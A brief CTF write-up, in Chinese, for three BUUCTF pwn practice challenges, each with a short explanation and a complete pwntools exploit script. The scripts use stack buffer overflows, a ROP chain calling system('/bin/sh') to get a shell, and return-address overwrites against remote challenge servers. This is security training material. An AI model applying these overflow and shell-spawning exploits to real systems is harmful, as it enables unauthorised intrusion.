练习平台Buuctf
RIP
gdb调试,没有PIE,直接利用gets溢出,利用pop rdi ; ret控制,ret2system(整复杂了,ida看一下控制ret流就可以了)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| from pwn import *
context.log_level="debug"
io = remote('node4.buuoj.cn', 29531)
elf = ELF('./pwn1')
pop_rdi_ret = 0x00000000004011fb
sh_addr = next(elf.search(b'/bin/sh'))
ret = pop_rdi_ret+1
system_addr = elf.symbols['system']
print("[+] sh addr: {}".format(hex(sh_addr)))
print("[+] system addr: {}".format(hex(system_addr)))
payload = b'A'* 23 + p64(pop_rdi_ret) + p64(sh_addr) + p64(ret) + p64(system_addr)
io.send(payload)
io.interactive()
|
warmup_csaw_2016
控制ret地址,直接读flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| from pwn import *
context.log_level="debug"
io = remote('node4.buuoj.cn', 29490)
elf = ELF('./warmup_csaw_2016')
io.recvuntil(b"WOW:")
cat_flag_addr = int(io.recv(8),16)
io.send(b'A'*0x48+p64(cat_flag_addr))
io.interactive()
|
ciscn_2019_n_1
需要gets溢出,覆盖stack中的v2值
1
2
3
4
5
6
7
8
9
10
11
12
13
| from pwn import *
context.log_level="debug"
io = remote('node4.buuoj.cn', 29083)
v2 = 0x41348000
io.recvuntil(b"number.\n")
io.sendline(b"A"*(0x30-0x4) + p64(v2))
io.recv()
io.interactive()
|